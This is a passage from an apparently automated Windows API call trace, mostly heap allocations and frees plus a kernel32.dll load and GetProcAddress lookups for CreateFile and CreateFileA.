lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.591] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.592] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.592] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.592] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.592] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0030.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.593] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0030.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0030.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.595] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.598] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8898e0 [0030.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8898e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.598] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0030.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0030.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8898e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0030.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.598] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0030.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 